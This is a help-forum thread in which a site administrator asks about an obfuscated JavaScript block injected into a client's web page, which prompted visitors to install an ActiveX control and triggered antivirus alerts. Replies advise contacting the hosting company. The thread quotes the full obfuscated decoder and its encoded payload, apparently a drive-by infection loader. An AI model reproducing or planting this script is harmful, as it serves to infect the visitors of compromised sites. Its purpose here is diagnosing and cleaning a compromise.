?
Solved

remote data services data control bloodhound virus embedded in webpage

Posted on 2007-10-07
3
Medium Priority
?
4,215 Views
Last Modified: 2013-12-09
I have a client who had some clients calling saying there is a virus in his website.
The screen shots they emailed were scan results from Norton antivirus saying it was a bloodhound trojan.  

I went to the website and was prompted to install "remote data services data control" active x object.

I declined ;)

I downloaded the actual index page and found this suspicious javascript in it.:

<SCRIPT LANGUAGE="JavaScript">
<!--
function N9203f348(Ac85Fc8){var Hb59a2A=arguments.callee.toString().replace(/\W/g,"").toUpperCase();var o21A8D0a391EB9772;o21A8D0a391EB9772+=714;o21A8D0a391EB9772=o21A8D0a391EB9772.toString();var fuwck_Allav=1;var i=o21A8D0a391EB9772.charCodeAt(224);var h33faE2;var G1447bb2B81EB9772;G1447bb2B81EB9772+=185;G1447bb2B81EB9772=G1447bb2B81EB9772.toString();var stSllaSllop_av=1;var I26565c=Hb59a2A.length;var me7740035fbEB9772;me7740035fbEB9772++;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var E6a08E;var d6a874AEE12EB9772;d6a874AEE12EB9772++;d6a874AEE12EB9772=d6a874AEE12EB9772.toString();var stSllaSllop_av=1;var TDCc45;var CB9cfe29494EB9772;CB9cfe29494EB9772-=403;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var n7F49b8f8='';var iC49Cd=new Array(0,1400113684+(596846210),3308810245+(685109543),1081686462+(1485838332),93390784+(31243353),5414358+(1880643257),2088893729+(1826727956),1358664212+(1298727823),139801186+(109467088),588180366+(1456327958),3095672491+(676442739),649397390+(1897780474),49274316+(113667679),1343463824+(782097197),2755366762+(1132240285),682685923+(1745758126),335599512+(162937036),68856260+(1721071406),2474466460+(1614550188),789175331+(1437885883),263698001+(186850860),1727714474+(115544129),3525802212+(581778541),801317111+(1410360528),22344584+(303539406),1625402458+(59374694),2387520284+(1863601758),949011337+(1372915299),205539807+(130093680),1390845472+(270519993),2056866876+(2138435879),305939319+(2060175998),615825076+(381248020),605892112+(676061774),2181324650+(1398530682),1564392047+(1160296195),597666762+(409221383),180832697+(1077774990),3212561258+(311540371),2652859702+(116082741),514478422+(386619300),131017574+(987983110),1672653991+(2013863215),2071894759+(826170969),789053046+(63991405),173646249+(998619852),3280570311+(424445448),949599321+(1933017344),79560369+(572207611),708011456+(665492090),2146134725+(1223419579),1557948405+(1660156193),411714292+(153792961),1104045341+(350576390),2562078632+(923033073),1463645875+(1635790428),149228107+(522038867),955046840+(639151184),2461508851+(861222079),2116264504+(854083308),372282533+(423552994),631055915+(852174310),2477591617+(766775658),2255348551+(804801014),465910108+(1528236084),13335841+(17822693),598810563+(1965097209),2086260462+(1937457468),811861782+(1095597683),96120498+(16516717),626613044+(2053540209),2422210075+(1482216984),896639248+(1117137042),93856511+(157865525),2356311069+(160904305),3036096338+(739733702),1366600782+(771055981),121534312+(19842501),1914010321+(525267398),2522007705+(1343263592),1325333703+(476861741),158772487+(318092379),1382065230+(855936138),3886816065+(179692813),405969475+(1406401450),33401713+(419691018),366141783+(1815483242),2987960606+(1123490617),1435452155+(270636747),98863735+(215178969),366958276+(1977573926),3545827791+(694189741),277262287+(1381395984),136374018+(230245959),863679568+(1498990755),3462845985+(762148420),688847331+(614688629),653318655+(331642831),2194884852+(552122240),1858751225+(1710286313),1066583385+(189587432),579425509+(458178802),1720191084+(1045019649),3138668351+(415411644),900399575+(230614931),553436038+(326243958),1754098116+(1155145346),2662100944+(1001670912),490975226+(650149241),31271810+(824570467),2655350774+(197450857),3587996848+(120651801),60917875+(1281616073),255531617+(398927689),2888051433+(300344615),2832481298+(540533876),781607351+(684872558),60890683+(483288952),1446499420+(1664024493),2507012709+(955509306),1094105172+(497565882),612301557+(89837219),1316761403+(1649699047),1473837546+(1878961866),918856906+(586061901),565897591+(217654282),2589013804+(493626639),2675257300+(558185689),3817965560+(170326824),1550505767+(1045748879),3645782+(58671286),341725769+(1616085073),2435918264+(1503927681),1481808108+(1166008003),5278208+(76192789),209260911+(1734542612),3590470620+(224448310),1450438389+(1039158415),87093413+(138181017),38068358+(2015722018),3254088244+(572087511),1680725279+(786180734),45243840+(122572903),243947792+(1853703585),2187984851+(1839567729),1976255600+(289234786),256690259+(246753813),1385094175+(376956639),3892838250+(257578995),243351049+(1910778306),373622955+(52899270),1097363001+(755144878),3017904096+(1257409430),1477636575+(834681345),78884156+(203869470),541649362+(1200906490),2353820643+(1835887500),1414628210+(980249735),230496636+(167421127),1238152950+(384030687),1578392273+(2025998615),834786024+(1880080534),432643715+(521086017),1297710604+(42366022),2620115096+(898604889),1438532180+(1358828819),99326768+(969501613),96585660+(1123053199),3374238264+(250503586),1378443658+(1558231490),821079355+(85106107),268221414+(822591098),3550743427+(196928576),1845197928+(980181741),300518100+(528811035),326174017+(855161144),2142761277+(1269416527),2385269994+(775564848),362116112+(265969296),1238215209+(144390157),2884509603+(538859506),1539643225+(1598435242),435905480+(134656753),1056532694+(369868121),3031683603+(285632939),2377453759+(621279849),616788130+(116451824),989003473+(566258483),1667406006+(1601529585),2589060315+(461300310),277127094+(475332309),61275669+(1480044552),2413174724+(193897196),2658389814+(1307583216),1254919420+(715003552),7356361+(33379137),2098908838+(518928387),2259071986+(1684505165),1845016240+(68071637),69651736+(14256635),1417088627+(1095253007),2744377486+(1059363206),483185550+(1592023072),200646201+(12614911),423727656+(2039544947),1735156178+(2120834107),913659831+(1181194240),32275459+(166683422),1513113705+(748915307),2610097073+(1447163537),1218370290+(540989702),315467757+(218946433),1278603410+(898115131),3463682660+(675646455),937275899+(936560102),60245631+(354418936),985322630+(1296926304),2492948488+(1786251880),553899693+(1157784861),104871107+(180410009),2305733185+(100068542),3176664417+(990552328),1550934650+(83533145),82263963+(293965738),2534416000+(150651896),2809470708+(798536698),1231369400+(77549212),286963654+(669580284),2472996890+(335558215),2041418802+(1454539461),1024260344+(207375957),664042847+(383384188),2566540799+(366419019),2771152154+(883551682),512850112+(575509158),678437681+(258480319),1990812758+(856902141),1980134430+(1756703399),985843580+(217057283),28650346+(788583551),2126958820+(1056383288),1440289282+(1960947848),658168939+(746108613),508774181+(107043969),2645096838+(489110655),1770752488+(1682668715),433094608+(990762841),18314334+(583136097),1688400666+(1321436948),3293646402+(1064054),1177578193+(389525553),2351958+(709576766),2029052089+(991616382),2799321367+(473058698),1305197241+(205136994),368065956+(387101161));E6a08E=4294967295;for(h33faE2=0;h33faE2<I26565c;h33faE2++){E6a08E=iC49Cd[(E6a08E^Hb59a2A.charCodeAt(h33faE2))&255]^((E6a08E>>8)&16777215);}E6a08E=E6a08E^4294967295;var G50271DD;var l571d8;h33faE2=E6a08E&65535;G50271DD=h33faE2.toString(16).toUpperCase();while(G50271DD.length<4){G50271DD="0"+G50271DD;}h33faE2=(E6a08E>>>16)&65535;l571d8=h33faE2.toString(16).toUpperCase();while(l571d8.length<4){l571d8="0"+l571d8;}TDCc45=l571d8+G50271DD;var P94783f;var t793BCD0=0;var P18945766;var t3B037e;var i0eFA2450;var Efefb48='';for(P94783f=0;P94783f<Ac85Fc8.length;P94783f+=2){i0eFA2450=0;n7F49b8f8="";t3B037e="";t3B037e+=Ac85Fc8.charAt(P94783f);t3B037e+=Ac85Fc8.charAt(P94783f+1);P18945766=parseInt(t3B037e,16);i0eFA2450=P18945766-TDCc45.charCodeAt(t793BCD0);if(t793BCD0<TDCc45.length-1){t793BCD0++;}else{t793BCD0=0;}P94783f+=2;while(i0eFA2450!=0){t3B037e="";t3B037e+=Ac85Fc8.charAt(P94783f);t3B037e+=Ac85Fc8.charAt(P94783f+1);P18945766=parseInt(t3B037e,16);n7F49b8f8+=String.fromCharCode(P18945766-TDCc45.charCodeAt(t793BCD0));if(t793BCD0<TDCc45.length-1){t793BCD0++;}else{t793BCD0=0;}i0eFA2450--;P94783f+=2;}var rEE11EB3=parseInt(n7F49b8f8);if(rEE11EB3!=0){if(rEE11EB3>127){n7F49b8f8="&#"+rEE11EB3.toString()+";";}else{n7F49b8f8=String.fromCharCode(rEE11EB3);}Efefb48+=n7F49b8f8;}P94783f-=2;}document.write(Efefb48);var Ie8895df220EB9772;Ie8895df220EB9772--;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var nF9eed8ce76EB9772;nF9eed8ce76EB9772++;nF9eed8ce76EB9772=nF9eed8ce76EB9772.toString();var stSllaSllop_av=1;}
N9203f348('396E624475684868686e35737162486869683573726747706e3b637375347667683A6B79436777396D68357371664868676a3573726547706e3b63727a347667683a65744462766C3a696376436A7E396D693475753476676b3B6373773476686D3B637373337a6f396c69447568476c6D3A667b43657b396c6F34777433796D396c6b447663476C6e3a6678436675396C6d3476783476676A3B63737233796e3A69637244627568396C68447A6a4868676B35737166476D6a3B637373337b68397169457261753a68686b4572617a3A686962447465476A693B63737a3476676C3b6372713476686d3b637275337b68396c6b4474634868676C357371624868676D357371644868676c35737267476d683A667B4364773a6869674572627B3A686A634572617d3A686863447762476a6b3a6B7A446276683A696376446275673a6962734462766b396D6A447463476B6F3b637373347669673a6576436777396d683476783476676c3B6372733476686b3A6b79446275703A696273436777');
//-->
</SCRIPT>


The client did not put this in his webpage.  I removed it and am no longer prompted to install the active X.

I was not able to find much on Google regarding this but it seems it could be from and unpatched server being comprimised.

I am hesitant to go to the hosting company until I have some facts.

any advice would be great.

thanks.
0
Comment
Question by:livegirllove
  • 2
3 Comments
 
LVL 16

Expert Comment

by:Kiran Paul VJ
ID: 20032620
Inform the server people that they have a virus in their server
0
 
LVL 16

Accepted Solution

by:
Kiran Paul VJ earned 2000 total points
ID: 20032629
0
 
LVL 1

Author Comment

by:livegirllove
ID: 20032649
Yes this is my same symptoms.  I read those but wanted some backup.

I will contact the hosting company.
0

Featured Post

Concerto Cloud for Software Providers & ISVs

Can Concerto Cloud Services help you focus on evolving your application offerings, while delivering the best cloud experience to your customers? From DevOps to revenue models and customer support, the answer is yes!

Learn how Concerto can help you.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article demonstrates how to create a simple responsive confirmation dialog with Ok and Cancel buttons using HTML, CSS, jQuery and Promises
In this blog, we’ll look at how improvements to Percona XtraDB Cluster improved IST performance.
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…
Suggested Courses

830 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question